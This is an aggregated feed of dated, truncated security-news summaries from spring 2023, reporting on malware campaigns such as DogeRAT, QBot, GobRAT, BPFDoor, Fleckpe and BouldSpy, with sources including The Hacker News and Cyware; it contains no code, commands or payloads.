A new Android malware threat was discovered targeting users primarily located in India. Named DogeRAT, the malware is distributed through social media and messaging platforms disguised as Opera Mini, OpenAI ChatGPT, and premium versions of Netflix and YouTube. It can gain unauthorized access to a u... (Cyware)
June 01, 2023
Evasive QBot Malware Leverages Short-lived Residential IPs for Dynamic Attacks
Abstract
An analysis of the "evasive and tenacious" malware known as QBot has revealed that 25% of its command-and-control (C2) servers are merely active for a single day. What's more, 50% of the servers don't remain active for more than a week, indicating the use of an adaptable and dynamic C2 infrastructure, Lumen Black Lotus Labs said in a report shared with The Hacker News. "This botnet has adapted techniques to conceal its infrastructure in residential IP space and infected web servers, as opposed to hiding in a network of hosted virtual private servers (VPSs)," security researchers Chris Formosa and Steve Rudd said. QBot, also called QakBot and Pinkslipbot, is a persistent and potent threat that started off as a banking trojan before evolving into a downloader for other payloads, including ransomware. Its origins go back as far as 2007. The malware arrives on victims' devices via spear-phishing emails, which either directly incorporate lure files o... (The Hacker News)
June 01, 2023
New Zero-Click Hack Targets iOS Users with Stealthy Root-Privilege Malware
Abstract
A previously unknown advanced persistent threat (APT) is targeting iOS devices as part of a sophisticated and long-running mobile campaign dubbed Operation Triangulation that began in 2019. "The targets are infected using zero-click exploits via the iMessage platform, and the malware runs with root privileges, gaining complete control over the device and user data," Kaspersky said. The Russian cybersecurity company said it discovered traces of compromise after creating offline backups of the targeted devices. The attack chain begins with the iOS device receiving a message via iMessage that contains an attachment bearing the exploit. The exploit is said to be zero-click, meaning the receipt of the message triggers the vulnerability without requiring any user interaction in order to achieve code execution. It's also configured to retrieve additional payloads for privilege escalation and drop a final stage malware from a remote server that Kaspersky described as... (The Hacker News)
June 01, 2023
Malicious PyPI Packages Using Compiled Python Code to Bypass Detection
Abstract
Researchers have discovered a novel attack on the Python Package Index (PyPI) repository that employs compiled Python code to sidestep detection by application security tools. "It may be the first supply chain attack to take advantage of the fact that Python bytecode (PYC) files can be directly executed," ReversingLabs analyst Karlo Zanki said in a report shared with The Hacker News. The package in question is fshec2, which was removed from the package registry on April 17, 2023, following responsible disclosure on the same day. PYC files are compiled bytecode files that are generated by the Python interpreter when a Python program is executed. "When a module is imported for the first time (or when the source file has changed since the current compiled file was created) a .pyc file containing the compiled code should be created in a __pycache__ subdirectory of the directory containing the .py file," explains the Python documentation. The package, per th... (The Hacker News)
May 31, 2023
RomCom RAT Using Deceptive Web of Rogue Software Sites for Covert Attacks
Abstract
The threat actors behind RomCom RAT are leveraging a network of fake websites advertising rogue versions of popular software at least since July 2022 to infiltrate targets. Cybersecurity firm Trend Micro is tracking the activity cluster under the name Void Rabisu, which is also known as Tropical Scorpius (Unit 42) and UNC2596 (Mandiant). "These lure sites are most likely only meant for a small number of targets, thus making discovery and analysis more difficult," security researchers Feike Hacquebord, Stephen Hilt, Fernando Merces, and Lord Alfred Remorin said. Some of the impersonated apps spotted so far include AstraChat, Devolutions' Remote Desktop Manager, Gimp, GoTo Meeting, KeePass, OpenAI ChatGPT, Signal, Veeam Backup & Replication, and WinDirStat. RomCom RAT was first chronicled by Palo Alto Networks Unit 42 in August 2022, linking it to a financially motivated group deploying Cuba Ransomware (aka COLDDRAW). It's worth noting that there is no... (The Hacker News)
May 30, 2023
Sneaky DogeRAT Trojan Poses as Popular Apps, Targets Indian Android Users
Abstract
A new open source remote access trojan (RAT) called DogeRAT targets Android users primarily located in India as part of a sophisticated malware campaign. The malware is distributed via social media and messaging platforms under the guise of legitimate applications like Opera Mini, OpenAI ChatGPT, and Premium versions of YouTube, Netflix, and Instagram. "Once installed on a victim's device, the malware gains unauthorized access to sensitive data, including contacts, messages, and banking credentials," cybersecurity firm CloudSEK said in a Monday report. "It can also take control of the infected device, enabling malicious actions such as sending spam messages, making unauthorized payments, modifying files, and even remotely capturing photos through the device's cameras." DogeRAT, like many other malware-as-a-service (MaaS) offerings, is promoted by its India-based developer through a Telegram channel that has more than 2,100 subscribers since it wa... (The Hacker News)
May 29, 2023
AceCryptor: Cybercriminals’ Powerful Weapon, Detected in 240K+ Attacks
Abstract
A crypter (alternatively spelled cryptor) malware dubbed AceCryptor has been used to pack numerous strains of malware since 2016. Slovak cybersecurity firm ESET said it identified over 240,000 detections of the crypter in its telemetry in 2021 and 2022. This amounts to more than 10,000 hits per month. Some of the prominent malware families contained within AceCryptor are SmokeLoader, RedLine Stealer, RanumBot, Raccoon Stealer, Stop ransomware, and Amadey, among others. The countries with the most detections include Peru, Egypt, Thailand, Indonesia, Turkey, Brazil, Mexico, South Africa, Poland, and India. AceCryptor was first highlighted by Avast in August 2022, detailing the use of the malware to distribute Stop ransomware and RedLine Stealer on Discord in the form of 7-Zip files. Crypters are similar to packers, but instead of using compression, they are known to obfuscate the malware code with encryption to make detection and reverse engineering a lot more challenging. (The Hacker News)
May 29, 2023
New Go-written GobRAT RAT targets Linux Routers in Japan
Abstract
A new Golang remote access trojan (RAT), tracked as GobRAT, is targeting Linux routers in Japan, the JPCERT Coordination Center warns. JPCERT/CC is warning of cyberattacks against Linux routers in Japan that have been infected with a new Golang remote... (Security Affairs)
May 29, 2023
Researchers analyzed the PREDATOR spyware and its loader Alien
Abstract
Cisco Talos and the Citizen Lab researchers have published a technical analysis of the powerful Android spyware Predator. Security researchers at Cisco Talos and the Citizen Lab have shared technical details about a commercial Android spyware named... (Security Affairs)
May 29, 2023
Enhanced Legion Credential Harvester Targets SSH Servers and AWS Credentials
Abstract
An updated version of the Python-based, cloud-focused hack tool called Legion—which can extract credentials from vulnerable web servers—has surfaced. The updated variant incorporates the Paramiko module to exploit SSH servers. Furthermore, it can now retrieve specific AWS credentials associated wit... (Cyware)
May 29, 2023
New GobRAT Remote Access Trojan Targeting Linux Routers in Japan
Abstract
Linux routers in Japan are the target of a new Golang remote access trojan (RAT) called GobRAT. "Initially, the attacker targets a router whose WEBUI is open to the public, executes scripts possibly by using vulnerabilities, and finally infects the GobRAT," the JPCERT Coordination Center (JPCERT/CC) said in a report published today. The compromise of an internet-exposed router is followed by the deployment of a loader script that acts as a conduit for delivering GobRAT, which, when launched, masquerades as the Apache daemon process (apached) to evade detection. The loader is also equipped to disable firewalls, establish persistence using the cron job scheduler, and register an SSH public key in the .ssh/authorized_keys file for remote access. GobRAT, for its part, communicates with a remote server via the Transport Layer Security (TLS) protocol to receive as many as 22 different encrypted commands for execution. Some of the major commands are as follows - Obt... (The Hacker News)
May 28, 2023
New Bandit Stealer targets web browsers and cryptocurrency wallets
Abstract
Bandit Stealer is a new stealthy information stealer malware that targets numerous web browsers and cryptocurrency wallets. Trend Micro researchers discovered a new info-stealing malware, dubbed Bandit Stealer, which is written in the Go language... (Security Affairs)
May 27, 2023
New Stealthy Bandit Stealer Targeting Web Browsers and Cryptocurrency Wallets
Abstract
A new stealthy information stealer malware called Bandit Stealer has caught the attention of cybersecurity researchers for its ability to target numerous web browsers and cryptocurrency wallets. "It has the potential to expand to other platforms as Bandit Stealer was developed using the Go programming language, possibly allowing cross-platform compatibility," Trend Micro said in a Friday report. The malware is currently focused on targeting Windows by using a legitimate command-line tool called runas.exe that allows users to run programs as another user with different permissions. The goal is to escalate privileges and execute itself with administrative access, thereby effectively bypassing security measures to harvest wide swathes of data. That said, Microsoft's access control mitigations to prevent unauthorized execution of the tool means an attempt to run the malware binary as an administrator requires providing the necessary credentials. "By using the... (The Hacker News)
May 27, 2023
Pegasus spyware was deployed in Armenia amid Nagorno-Karabakh war
Abstract
A number of individuals from Armenia contacted the digital rights organizations CyberHUB-AM, an Armenian organization, and Access Now to check their devices for evidence of such spyware. (Cyware)
May 26, 2023
New CosmicEnergy ICS malware threatens energy grid assets
Abstract
Experts detailed a new piece of malware, named CosmicEnergy, that is linked to Russia and targets industrial control systems (ICS). Researchers from Mandiant discovered a new malware, named CosmicEnergy, designed to target operational technology... (Security Affairs)
May 26, 2023
Predator Android Spyware: Researchers Uncover New Data Theft Capabilities
Abstract
Security researchers have detailed the inner workings of the commercial Android spyware called Predator, which is marketed by the Israeli company Intellexa (previously Cytrox). Predator was first documented by Google's Threat Analysis Group (TAG) in May 2022 as part of attacks leveraging five different zero-day flaws in the Chrome web browser and Android. The spyware, which is delivered by means of another loader component called Alien, is equipped to record audio from phone calls and VoIP-based apps as well as gather contacts and messages, including from Signal, WhatsApp, and Telegram. Its other functionalities allow it to hide applications and prevent applications from being executed upon rebooting the handset. "A deep dive into both spyware components indicates that Alien is more than just a loader for Predator and actively sets up the low-level capabilities needed for Predator to spy on its victims," Cisco Talos said in a technical report. Spyware like Preda... (The Hacker News)
May 26, 2023
New COSMICENERGY Malware Exploits ICS Protocol to Sabotage Power Grids
Abstract
A new strain of malicious software that's engineered to penetrate and disrupt critical systems in industrial environments has been unearthed. Google-owned threat intelligence firm Mandiant dubbed the malware COSMICENERGY, adding it was uploaded to the VirusTotal public malware scanning utility in December 2021 by a submitter in Russia. There is no evidence that it has been put to use in the wild. "The malware is designed to cause electric power disruption by interacting with IEC 60870-5-104 (IEC-104) devices, such as remote terminal units (RTUs), that are commonly leveraged in electric transmission and distribution operations in Europe, the Middle East, and Asia," the company said. COSMICENERGY is the latest addition to specialized malware like Stuxnet, Havex, Triton, IRONGATE, BlackEnergy2, Industroyer, and PIPEDREAM, which are capable of sabotaging critical systems and wreaking havoc. Mandiant said that there are circumstantial links that it may have bee... (The Hacker News)
May 25, 2023
Operation “Total Exchange”: New PowerExchange Backdoor Discovered in the UAE
Abstract
While investigating attacks targeting a government entity in the UAE, Fortinet researchers also discovered an implant on Microsoft Exchange servers which was a novel web shell, dubbed ExchangeLeech, due to its unique ability to harvest credentials. (Cyware)
May 25, 2023
YouTube Pirated Software Videos Deliver Triple Threat: Vidar Stealer, Laplas Clipper, XMRig Miner
Abstract
FortiGuard Labs came across an ongoing threat campaign targeting YouTube users searching for pirated software earlier this month. Videos advertising downloads of pirated software are uploaded by verified YouTube channels with large subscriber counts. (Cyware)
May 24, 2023
Windows Kernel Drivers Used in BlackCat Attacks
Abstract
Trend Micro revealed that the BlackCat ransomware group is using a signed kernel driver for evasion tactics. The driver was utilized in conjunction with a separate user client executable, with the intention of manipulating, pausing, and terminating specific processes associated with the security on... (Cyware)
May 24, 2023
Data Stealing Malware Discovered in Popular Android Screen Recorder App
Abstract
Google has removed a screen recording app named "iRecorder - Screen Recorder" from the Play Store after it was found to sneak in information stealing capabilities nearly a year after the app was published as an innocuous app. The app (APK package name "com.tsoft.app.iscreenrecorder"), which accrued over 50,000 installations, was first uploaded on September 19, 2021. The malicious functionality is believed to have been introduced in version 1.3.8, which was released on August 24, 2022. "It is rare for a developer to upload a legitimate app, wait almost a year, and then update it with malicious code," ESET security researcher Lukáš Štefanko said in a technical report. "The malicious code that was added to the clean version of iRecorder is based on the open source AhMyth Android RAT (remote access trojan) and has been customized into what we named AhRat." iRecorder was first flagged as harboring the AhMyth trojan on October 28, 2022, by... (The Hacker News)
May 24, 2023
Legion Malware Upgraded to Target SSH Servers and AWS Credentials
Abstract
An updated version of the commodity malware called Legion comes with expanded features to compromise SSH servers and Amazon Web Services (AWS) credentials associated with DynamoDB and CloudWatch. "This recent update demonstrates a widening of scope, with new capabilities such as the ability to compromise SSH servers and retrieve additional AWS-specific credentials from Laravel web applications," Cado Labs researcher Matt Muir said in a report shared with The Hacker News. "It's clear that the developer's targeting of cloud services is advancing with each iteration." Legion, a Python-based hack tool, was first documented last month by the cloud security firm, detailing its ability to breach vulnerable SMTP servers in order to harvest credentials. It's also known to exploit web servers running content management systems (CMS), leverage Telegram as a data exfiltration point, and send spam SMS messages to a list of dynamically-generated U.S. mobile num... (The Hacker News)
May 24, 2023
AhRat Android RAT was concealed in iRecorder app in Google Play
Abstract
ESET found a new remote access trojan (RAT), dubbed AhRat, on the Google Play Store that was concealed in an Android screen recording app. ESET researchers have discovered an Android app on Google Play that was hiding a new remote access trojan (RAT)... (Security Affairs)
May 23, 2023
New WinTapix.sys Malware Engages in Multi-Stage Attack Across Middle East
Abstract
An unknown threat actor has been observed leveraging a malicious Windows kernel driver in attacks likely targeting the Middle East since at least May 2020. Fortinet Fortiguard Labs, which dubbed the artifact WINTAPIX (WinTapix.sys), attributed the malware with low confidence to an Iranian threat actor. "WinTapix.sys is essentially a loader," security researchers Geri Revay and Hossein Jazi said in a report published on Monday. "Thus, its primary purpose is to produce and execute the next stage of the attack. This is done using a shellcode." Samples and telemetry data analyzed by Fortinet show that the campaign's primary focus is on Saudi Arabia, Jordan, Qatar, and the United Arab Emirates. The activity has not been tied to a known threat actor or group. By using a malicious kernel mode driver, the idea is to subvert or disable security mechanisms and gain entrenched access to the targeted host. Such drivers run within the kernel memory and can, there... (The Hacker News)
May 22, 2023
KeePass Exploit Allows Attackers to Recover Master Passwords from Memory
Abstract
A proof-of-concept (PoC) has been made available for a security flaw impacting the KeePass password manager that could be exploited to recover a victim's master password in cleartext under specific circumstances. The issue, tracked as CVE-2023-32784, impacts KeePass versions 2.x for Windows, Linux, and macOS, and is expected to be patched in version 2.54, which is likely to be released early next month. "Apart from the first password character, it is mostly able to recover the password in plaintext," security researcher "vdohney," who discovered the flaw and devised a PoC, said. "No code execution on the target system is required, just a memory dump." "It doesn't matter where the memory comes from," the researcher added, stating, "it doesn't matter whether or not the workspace is locked. It is also possible to dump the password from RAM after KeePass is no longer running, although the chance of that working goes down w... (The Hacker News)
May 20, 2023
Malicious VSCode Extensions: Password Theft and Remote Shell Exploits
Abstract
Check Point took the wraps off of three malicious Microsoft Visual Studio extensions on May 4, 2023, aimed at exploiting VSCode Marketplace visitors. These extensions, named Theme Darcula dark, python-vscode, and prettiest java, were downloaded by Windows developers nearly 46,000 times. Actors could... (Cyware)
May 20, 2023
Meet ‘Jack’ from Romania! Mastermind Behind Golden Chickens Malware
Abstract
The identity of the second threat actor behind the Golden Chickens malware has been uncovered courtesy of a "fatal" operational security blunder, cybersecurity firm eSentire said. The individual in question, who lives in Bucharest, Romania, has been given the codename Jack. He is one of the two criminals operating an account on the Russian-language Exploit.in forum under the name "badbullzvenom," the other being "Chuck from Montreal." eSentire characterized Jack as the true mastermind behind Golden Chickens. Evidence unearthed by the Canadian company shows that he is also listed as the owner of a vegetable and fruit import and export business. "Like 'Chuck from Montreal,' 'Jack' uses multiple aliases for the underground forums, social media, and Jabber accounts, and he too has gone to great lengths to disguise himself," eSentire researchers Joe Stewart and Keegan Keplinger said. "'Jack' has taken great pa... (The Hacker News)
May 20, 2023
Golang Variant of Cobalt Strike ‘Geacon’ Targets macOS
Abstract
There is a growing trend in utilizing Geacon (a Golang implementation of the Cobalt Strike beacon) to target macOS devices, revealed SentinelOne. The package appeared specifically crafted to first verify its execution on a macOS system and subsequently retrieve an unsigned 'Geacon Plus' payload fr... (Cyware)
May 19, 2023
NPM packages found containing the TurkoRat infostealer
Abstract
Experts discovered two malicious packages in the npm package repository, both were laced with an open-source info-stealer called TurkoRat. ReversingLabs discovered two malicious packages, respectively named nodejs-encrypt-agent and nodejs-cookie-proxy-agent,... (Security Affairs)
May 19, 2023
Developer Alert: NPM Packages for Node.js Hiding Dangerous TurkoRat Malware
Abstract
Two malicious packages discovered in the npm package repository have been found to conceal an open source information stealer malware called TurkoRat. The packages – named nodejs-encrypt-agent and nodejs-cookie-proxy-agent – were collectively downloaded approximately 1,200 times and were available for more than two months before they were identified and taken down. ReversingLabs, which broke down the details of the campaign, described TurkoRat as an information stealer capable of harvesting sensitive information such as login credentials, website cookies, and data from cryptocurrency wallets. While nodejs-encrypt-agent came fitted with the malware inside, nodejs-cookie-proxy-agent was found to disguise the trojan as a dependency under the name axios-proxy. nodejs-encrypt-agent was also engineered to masquerade as another legitimate npm module known as agent-base, which has been downloaded over 25 million times to date. The list of the rogue packages and their associated vers... (The Hacker News)
May 19, 2023
Researchers Identify Second Developer of ‘Golden Chickens’ Malware
Abstract
Offered under a malware-as-a-service (MaaS) model since 2018, Golden Chickens has been used by the Russia-based Cobalt Group and FIN6 cybercrime rings to target organizations in various industries, causing financial losses of more than $1.4 billion. (Cyware)
May 18, 2023
Qualys Discovers New Sotdas Malware Variant
Abstract
The latest iteration of the Sotdas malware has emerged, showcasing a variety of innovative features and advanced techniques for evading detection. This malware family is written in C++. After achieving persistence and collecting system information, Sotdas leverages this data for optimizing resource... (Cyware)
May 18, 2023
Millions of Smartphones Distributed Worldwide With Preinstalled ‘Guerrilla’ Malware
Abstract
Since 2021, Trend Micro has been tracking a different operation that appears to be linked to Triada. The group behind the campaign is tracked by the cybersecurity firm as Lemon Group and the malware preloaded on devices is called Guerrilla. (Cyware)
May 17, 2023
Malicious Microsoft VSCode extensions steal passwords, open remote shells
Abstract
Cybercriminals are starting to target Microsoft's VSCode Marketplace, uploading three malicious Visual Studio extensions that Windows developers downloaded 46,600 times. (BleepingComputer)
May 16, 2023
Open-source Cobalt Strike port ‘Geacon’ used in macOS attacks
Abstract
Geacon, a Go-based implementation of the beacon from the widely abused penetration testing suite Cobalt Strike, is being used more and more to target macOS devices. (BleepingComputer)
May 16, 2023
CopperStealer Malware Crew Resurfaces with New Rootkit and Phishing Kit Modules
Abstract
The threat actors behind the CopperStealer malware resurfaced with two new campaigns in March and April 2023 that are designed to deliver two novel payloads dubbed CopperStealth and CopperPhish. Trend Micro is tracking the financially motivated group under the name Water Orthrus. The adversary is also assessed to be behind another campaign known as Scranos, which was detailed by Bitdefender in 2019. Active since at least 2021, Water Orthrus has a track record of leveraging pay-per-install (PPI) networks to redirect victims landing on cracked software download sites to drop an information stealer codenamed CopperStealer. Another campaign spotted in August 2022 entailed the use of CopperStealer to distribute Chromium-based web browser extensions that are capable of performing unauthorized transactions and transferring cryptocurrency from victims' wallets to ones under attackers' control. The latest attack sequences documented by Trend Micro don't mark mu... (The Hacker News)
May 15, 2023
BPFDoor Backdoor Gets Stealthier with New Variant
Abstract
Cybersecurity experts took the wraps off of a newer variant of BPFDoor (BPF stands for Berkeley Packet Filter), which is capable of maintaining persistent access to breached systems for extended periods. The new variant has remained entirely undetected by all the virus-detection engines on VirusTot... (Cyware)
May 15, 2023
CLR SqlShell Malware Targets MS SQL Servers for Crypto Mining and Ransomware
Abstract
Poorly managed Microsoft SQL (MS SQL) servers are the target of a new campaign that's designed to propagate a category of malware called CLR SqlShell that ultimately facilitates the deployment of cryptocurrency miners and ransomware. "Similar to web shell, which can be installed on web servers, SqlShell is a malware strain that supports various features after being installed on an MS SQL server, such as executing commands from threat actors and carrying out all sorts of malicious behavior," AhnLab Security Emergency response Center (ASEC) said in a report published last week. A stored procedure is a subroutine that contains a set of Structured Query Language (SQL) statements for use across multiple programs in a relational database management system (RDBMS). CLR (short for common language runtime) stored procedures – available in SQL Server 2005 and later – refer to stored procedures that are written in a .NET language such as C# or Visual Basic. The attack me... (The Hacker News)
May 12, 2023
XWorm Malware Exploits Follina Vulnerability in New Wave of Attacks Full Text
Abstract
Cybersecurity researchers have discovered an ongoing phishing campaign that makes use of a unique attack chain to deliver the XWorm malware on targeted systems. Securonix, which is tracking the activity cluster under the name MEME#4CHAN, said some of the attacks have primarily targeted manufacturing firms and healthcare clinics located in Germany. "The attack campaign has been leveraging rather unusual meme-filled PowerShell code, followed by a heavily obfuscated XWorm payload to infect its victims," security researchers Den Iuzvyk, Tim Peck, and Oleg Kolesnikov said in a new analysis shared with The Hacker News. The report builds on recent findings from Elastic Security Labs, which revealed the threat actor's reservation-themed lures to deceive victims into opening malicious documents capable of delivering XWorm and Agent Tesla payloads. The attacks begin with phishing attacks to distribute decoy Microsoft Word documents that, instead of using macros, weaponiThe Hacker News
May 12, 2023
New Stealthy Variant of Linux Backdoor BPFDoor Emerges from the Shadows Full Text
Abstract
A previously undocumented and mostly undetected variant of a Linux backdoor called BPFDoor has been spotted in the wild, cybersecurity firm Deep Instinct said in a technical report published this week. "BPFDoor retains its reputation as an extremely stealthy and difficult-to-detect malware with this latest iteration," security researchers Shaul Vilkomir-Preisman and Eliran Nissan said. BPFDoor (aka JustForFun), first documented by PwC and Elastic Security Labs in May 2022, is a passive Linux backdoor associated with a Chinese threat actor called Red Menshen (aka DecisiveArchitect or Red Dev 18), which is known to single out telecom providers across the Middle East and Asia since at least 2021. The malware is specifically geared towards establishing persistent remote access to compromised target environments for extended periods of time, with evidence pointing to the hacking crew operating the backdoor undetected for years. BPFDoor gets its name from the uThe Hacker News
May 10, 2023
Sophisticated DownEx Malware Campaign Targeting Central Asian Governments Full Text
Abstract
Government organizations in Central Asia are the target of a sophisticated espionage campaign that leverages a previously undocumented strain of malware dubbed DownEx. Bitdefender, in a report shared with The Hacker News, said the activity remains active, with evidence likely pointing to the involvement of Russia-based threat actors. The Romanian cybersecurity firm said it first detected the malware in a highly targeted attack aimed at foreign government institutions in Kazakhstan in late 2022. Subsequently, another attack was observed in Afghanistan. The use of a diplomat-themed lure document and the campaign's focus on data exfiltration suggests the involvement of a state-sponsored group, although the exact identity of the hacking outfit remains indeterminate at this stage. The initial intrusion vector for the campaign is suspected to be a spear-phishing email bearing a booby-trapped payload, which is a loader executable that masquerades as a Microsoft Word file. OpeniThe Hacker News
May 10, 2023
Fake Windows System Update Drops Aurora Stealer via Invalid Printer Loader Full Text
Abstract
Attackers are using malicious ads to redirect users to what looks like a Windows security update. The scheme is very well designed as it relies on the web browser to display a full-screen animation resembling what you'd expect from Microsoft.Cyware
May 9, 2023
Building Automation System Exploit Brings KNX Security Back in Spotlight Full Text
Abstract
A public exploit targeting building automation systems has brought KNX security back into the spotlight, with industrial giant Schneider Electric releasing a security bulletin to warn customers about the potential risks.Cyware
May 9, 2023
DrIBAN Toolkit Targets Italian Corporate Banking Full Text
Abstract
Experts at Cleafy disclosed nearly a four-year-long online fraud campaign that infected Windows systems in organizations using drIBAN, a web inject kit. Criminals attempted to alter legitimate banking transfers by changing the beneficiary details and redirecting the funds to their accounts. Organiz ...Cyware
May 05, 2023
New Android FluHorse malware steals your passwords, 2FA codes Full Text
Abstract
A new Android malware called 'FluHorse' has been discovered, targeting users in Eastern Asia with malicious apps that imitate legitimate versions.BleepingComputer
May 05, 2023
New Android Malware ‘FluHorse’ Targeting East Asian Markets with Deceptive Tactics Full Text
Abstract
Various sectors in East Asian markets have been subjected to a new email phishing campaign that distributes a previously undocumented strain of Android malware called FluHorse that abuses the Flutter software development framework. "The malware features several malicious Android applications that mimic legitimate applications, most of which have more than 1,000,000 installs," Check Point said in a technical report. "These malicious apps steal the victims' credentials and two-factor authentication (2FA) codes." The malicious apps have been found to imitate popular apps like ETC and VPBank Neo, which are widely used in Taiwan and Vietnam. Evidence gathered so far shows that the activity has been active since at least May 2022. The phishing scheme in itself is fairly straightforward, wherein victims are lured with emails that contain links to a bogus website that hosts malicious APK files. Also added to the website are checks that aim to screen victims anThe Hacker News
May 5, 2023
Fleckpe Android malware totaled +620K downloads via Google Play Store Full Text
Abstract
Fleckpe is a new Android subscription Trojan that was discovered in the Google Play Store, totaling more than 620,000 downloads since 2022. Fleckpe is a new Android subscription Trojan that spreads via Google Play, the malware discovered by Kaspersky...Security Affairs
May 05, 2023
Fleckpe Android Malware Sneaks onto Google Play Store with Over 620,000 Downloads Full Text
Abstract
A new Android subscription malware named Fleckpe has been unearthed on the Google Play Store, amassing more than 620,000 downloads in total since 2022. Kaspersky, which identified 11 apps on the official app storefront, said the malware masqueraded as legitimate photo editing apps, camera, and smartphone wallpaper packs. The apps have since been taken down. The operation primarily targets users from Thailand, although telemetry data gathered by the Russian cybersecurity firm has revealed victims in Poland, Malaysia, Indonesia, and Singapore. The apps further offer the promised functionality to avoid raising red flags, but conceal their real purpose under the hood. The list of the offending apps is as follows - Beauty Camera Plus (com.beauty.camera.plus.photoeditor) Beauty Photo Camera (com.apps.camera.photos) Beauty Slimming Photo Editor (com.beauty.slimming.pro) Fingertip Graffiti (com.draw.graffiti) GIF Camera Editor (com.gif.camera.editor) HD 4K Wallpaper (com.hd.h4ks.The Hacker News
May 04, 2023
New Fleckpe Android malware installed 600K times on Google Play Full Text
Abstract
A new Android subscription malware named 'Fleckpe' has been spotted on Google Play, the official Android app store, disguised as legitimate apps downloaded over 620,000 times.BleepingComputer
May 4, 2023
Experts devised a new exploit for the PaperCut flaw that can bypass all current detection Full Text
Abstract
VulnCheck researchers devised a new exploit for a recently disclosed critical flaw in PaperCut servers that bypasses all current detections. Cybersecurity researchers from VulnCheck have developed a new exploit for the recently disclosed critical...Security Affairs
May 4, 2023
Facebook warns of a new information-stealing malware dubbed NodeStealer Full Text
Abstract
Facebook discovered a new information-stealing malware, dubbed 'NodeStealer,' that is being distributed on Meta. NodeStealer is a new information-stealing malware distributed on Meta that allows stealing browser cookies to hijack accounts on multiple...Security Affairs
May 4, 2023
AresLoader Masquerades as Citrix Project to Drop Multiple Payloads Full Text
Abstract
Experts at Cyble laid bare AresLoader, a new type of loader that distributes multiple malware strains, including IcedID, Aurora Stealer, and Laplas Clipper. A GitHub repository masquerading as a Citrix project was being used to distribute the malware. Experts recommend creating multiple lines ...Cyware
May 3, 2023
AresLoader Malware Attacking Citrix Users Through Malicious GitLab Repo Full Text
Abstract
Cyble has recently detected AresLoader, a novel loader that is found to be disseminating numerous malware families. Malware loaders are designed to deploy and execute diverse malware strains on the targeted computer system of the victim.Cyware
May 02, 2023
BouldSpy Android Spyware: Iranian Government’s Alleged Tool for Spying on Minority Groups Full Text
Abstract
A new Android surveillanceware possibly used by the Iranian government has been used to spy on over 300 individuals belonging to minority groups. The malware, dubbed BouldSpy, has been attributed with moderate confidence to the Law Enforcement Command of the Islamic Republic of Iran (FARAJA). Targeted victims include Iranian Kurds, Baluchis, Azeris, and Armenian Christian groups. "The spyware may also have been used in efforts to counter and monitor illegal trafficking activity related to arms, drugs, and alcohol," Lookout said, based on exfiltrated data that contained photos of drugs, firearms, and official documents issued by FARAJA. BouldSpy, like other Android malware families, abuses its access to Android's accessibility services and other intrusive permissions to harvest sensitive data such as web browser history, photos, contact lists, SMS logs, keystrokes, screenshots, clipboard content, microphone audio, and video call recordings. It's worth poinThe Hacker News
May 02, 2023
LOBSHOT: A Stealthy, Financial Trojan and Info Stealer Delivered through Google Ads Full Text
Abstract
In yet another instance of how threat actors are abusing Google Ads to serve malware, a threat actor has been observed leveraging the technique to deliver a new Windows-based financial trojan and information stealer called LOBSHOT. "LOBSHOT continues to collect victims while staying under the radar," Elastic Security Labs researcher Daniel Stepanic said in an analysis published last week. "One of LOBSHOT's core capabilities is around its hVNC (Hidden Virtual Network Computing) component. These kinds of modules allow for direct and unobserved access to the machine." The American-Dutch company attributed the malware strain to a threat actor known as TA505 based on infrastructure historically connected to the group. TA505 is a financially motivated e-crime syndicate that overlaps with activity clusters tracked under the names Evil Corp, FIN11, and Indrik Spider. The latest development is significant because it's a sign that TA505, which is associateThe Hacker News
May 2, 2023
New Lobshot hVNC malware spreads via Google ads Full Text
Abstract
The previously undetected LOBSHOT malware is distributed using Google ads and gives operators VNC access to Windows devices. Researchers from Elastic Security Labs spotted a new remote access trojan dubbed LOBSHOT was being distributed through Google...Security Affairs
May 01, 2023
New Decoy Dog Malware Toolkit Uncovered: Targeting Enterprise Networks Full Text
Abstract
An analysis of over 70 billion DNS records has led to the discovery of a new sophisticated malware toolkit dubbed Decoy Dog targeting enterprise networks. Decoy Dog, as the name implies, is evasive and employs techniques like strategic domain aging and DNS query dribbling, wherein a series of queries are transmitted to the command-and-control (C2) domains so as to not arouse any suspicion. "Decoy Dog is a cohesive toolkit with a number of highly unusual characteristics that make it uniquely identifiable, particularly when examining its domains on a DNS level," Infoblox said in an advisory published late last month. The cybersecurity firm, which identified the malware in early April 2023 following anomalous DNS beaconing activity, said its atypical characteristics allowed it to map additional domains that are part of the attack infrastructure. That said, the usage of Decoy Dog in the wild is "very rare," with the DNS signature matching less than 0.0000027%The Hacker News
May 1, 2023
Experts spotted a new sophisticated malware toolkit called Decoy Dog Full Text
Abstract
Infoblox researchers discovered a new sophisticated malware toolkit, dubbed Decoy Dog, targeting enterprise networks. While analyzing billions of DNS records, Infoblox researchers discovered a sophisticated malware toolkit, dubbed Decoy...Security Affairs
May 1, 2023
Iranian govt uses BouldSpy Android malware for internal surveillance operations Full Text
Abstract
Iranian authorities have been spotted using the BouldSpy Android malware to spy on minorities and traffickers. Researchers at the Lookout Threat Lab have discovered a new Android surveillance spyware, dubbed BouldSpy, that was used by the Law Enforcement...Security Affairs
May 1, 2023
‘BouldSpy’ Android Malware Used in Iranian Government Surveillance Operations Full Text
Abstract
On the infected devices, BouldSpy harvests account usernames and associated application/service, a list of installed apps, browser data, call logs, clipboard content, contact lists, device information, a list of files and folders, and SMS messages.Cyware
May 01, 2023
Google Blocks 1.43 Million Malicious Apps, Bans 73,000 Bad Accounts in 2022 Full Text
Abstract
Google disclosed that its improved security features and app review processes helped it block 1.43 million bad apps from being published to the Play Store in 2022. In addition, the company said it banned 173,000 bad accounts and fended off over $2 billion in fraudulent and abusive transactions through developer-facing features like Voided Purchases API, Obfuscated Account ID, and Play Integrity API. The addition of identity verification methods such as phone number and email address to join Google Play contributed to a reduction in accounts used to publish apps that go against its policies, Google pointed out. The search behemoth further said it "prevented about 500K submitted apps from unnecessarily accessing sensitive permissions over the past 3 years." "In 2022, the App Security Improvements program helped developers fix ~500K security weaknesses affecting ~300K apps with a combined install base of approximately 250B installs," it noted. In contrast,The Hacker News
April 29, 2023
ViperSoftX uses more sophisticated encryption and anti-analysis techniques Full Text
Abstract
A new variant of the information-stealing malware ViperSoftX implements sophisticated techniques to avoid detection. Trend Micro researchers observed a new ViperSoftX malware campaign that unlike previous attacks relies on DLL sideloading for its arrival...Security Affairs
April 29, 2023
Atomic macOS Stealer is advertised on Telegram for $1,000 per month Full Text
Abstract
